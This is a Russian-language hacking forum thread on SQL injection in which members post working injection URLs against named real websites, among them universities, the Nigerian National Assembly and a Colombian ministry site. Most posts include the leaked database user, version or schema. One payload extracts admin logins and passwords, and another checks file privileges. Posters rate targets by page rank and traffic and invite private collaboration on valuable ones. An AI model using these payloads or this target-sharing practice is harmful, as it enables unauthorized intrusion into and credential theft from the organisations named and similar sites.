SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Code:
    http://uni-dance.ru/news.php?id=-86+union+select+1,2,3,concat(version(),0x3a,user())--
    Code:
    4.1.25-log:[email protected]
     
  2. speed21

    speed21 Хэшкрякер

    Joined:
    2 Feb 2012
    Messages:
    313
    Likes Received:
    105
    Reputations:
    29
    Code:
    http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,concat_ws(0x3a,database(),version()),6,7,8,9,0,1,2--+f
    Code:
    host1222787_site:5.1.66-log
    Моя первая :)
     
    erbolg and K800 like this.
  3. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    PR6
    http://www.geologie.ac.at/index.php?id=225&projectid=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
     
  4. unic0rn

    unic0rn Banned

    Joined:
    14 Jan 2014
    Messages:
    28
    Likes Received:
    17
    Reputations:
    16
    Code:
    http://www.nassnig.org/nass/news.php?id=-584+UNION+SELECT+1,user(),3,version(),database(),6,7,8+--+
    Nigerian National Assembly
    Alexa: 427,927
    PR: 6
     
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    http://www.msh.ru/gallery.php?did=-3+union+select+1,concat_ws(0x3a,login,password)+from+admin
     
    1 person likes this.
  6. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.iaurif.org/index.php?id=615&iaurif_publications_aff%5Betude%5D=-798)+UnIOn/**//**//**//**//**/+/**//**//**//**//**//**//**//**//**//**/SElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60+--+&cHash=7e9e071a42e29c23273d4efd70892d43
     
    1 person likes this.
  7. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    5.5.32-cll

    Code:
    http://kvadrostyle.ru/page/catalog.php?id=-1633%27+union+select+1,2,@@version,4,5,6,7,8,9,10+--+
    Яндекс тИЦ [​IMG] 250
     
    1 person likes this.
  8. unic0rn

    unic0rn Banned

    Joined:
    14 Jan 2014
    Messages:
    28
    Likes Received:
    17
    Reputations:
    16
    Code:
    http://www.mbc.edu/baldwin-job-board/detail.php?id=1000+AND+1=0+UNION+SELECT+1,2,3,user%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
    PR:5

    Code:
    http://proyectos.diariosur.es/cronica-universitaria/descargar.php?id=-21+UNION+SELECT+1,2,user(),4,5,6,7+--+
    MQ: On
    FP: Y
    Alexa: 9,866
    PR: 7

    Code:
    http://apps.jifsan.umd.edu/portal/courses_pages.php?cid=-18%27+union+select+1,2,user(),database(),5,6,7,8,9,10+--+
    Alexa: 8,772
    PR: 6

    Code:
    http://www.atlantic.edu/about/news/article.php?article=-991+union+select+1,user(),3,4,5,6,7,8,9,10,11,12
    PR: 6
     
    2 people like this.
  9. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Вывод где перечисления товаров

    Code:
    http://faunamarket.com/catalog.php?id=1%27+union+select+1,@@version+--+
    5.1.73-cll

    Яндекс тИЦ [​IMG] 50 Pr 1/10

    Есть форум на phpbb3
     
  10. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    [​IMG]
    Code:
    http://55let.rudn.ru/news.php?id=-35+union+select+1,2,concat(user(),0x3a,version()),4,5,6,7,8,9--
    root@localhost:5.6.11

    55 лет, а пишут дырявые движки.
     
    1 person likes this.
  11. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.tennis-piter.ru/pagerub.php?rub=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4--
    Code:
    5.1.63-0+squeeze1-log:[email protected]:z75741_portal
     
  12. unic0rn

    unic0rn Banned

    Joined:
    14 Jan 2014
    Messages:
    28
    Likes Received:
    17
    Reputations:
    16
    Code:
    http://www.businessownersideacafe.com/small_business_grants/winner.php?grant_id=-1+UNION+SELECT+user()+--+
    PR: 6

    Ничего интересного. Скулю вставил чтобы сообщение не считалось за флуд.

    Господа, нужна консультация по скулям, инклудам и так дальше.
    Совместное ковыряние жирных ссылок, которые не хотелось бы выкладывать в паблик. Если есть желающие - в ЛС, пожалуйста.
     
  13. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Code:
    http://game.vietgiaitri.com/vui-nhon-12.vgt+and+(ExtractValue(1,concat(0x3a,user(),0x3a,version(),0x3a,database())))
    Code:
    [email protected]:5.6.19:vietgia
     
    _________________________
  14. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.unatech.org/pagerub.php?cat_id=-21+union+select+1,2,3,4,5,6,@@version,8,9--
    Code:
     5.1.56 
     
  15. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    PR8
    http://pendientedemigracion.ucm.es/info/revesco/EdicionElectronica.php?IdRevista=-33+UnIoN/**//**//**//**//**/+/**//**//**//**//**//**//**//**//**//**//**//**//**//**//**/sELEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84+from+TRUsuarios+--+
     
  16. look2009

    look2009 Member

    Joined:
    3 Jun 2009
    Messages:
    80
    Likes Received:
    63
    Reputations:
    5
    http://www.minambiente.gov.co/index.php?option=com_spidercalendar&calendar_id=1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
     
  17. ninja96c

    ninja96c New Member

    Joined:
    29 Sep 2010
    Messages:
    8
    Likes Received:
    3
    Reputations:
    1
    вывод в ошибке
     
    #15837 ninja96c, 11 Sep 2014
    Last edited: 11 Sep 2014
    1 person likes this.
  18. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Code:
    http://mail.aaa.com.ua/news/18838.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
    5.5.38-0ubuntu0.12.04.1
    Вывод в алерте.
     
    _________________________
    2 people like this.
  19. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://archiv.jura.uni-saarland.de/entschdb/lagsaarland/dboutput.php?id=-42'+union+select+user(),2+--+
     
  20. hpol

    hpol Elder - Старейшина

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    16
    Reputations:
    15
    Code:
    http://teleskop.ru/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,File_Priv,4,5,6,7,8,9,10+from+mysql.user--&Itemid=3227
    
    mysql 5.0.45
    file priv y
    тиц 140 pr 3
     
Thread Status:
Not open for further replies.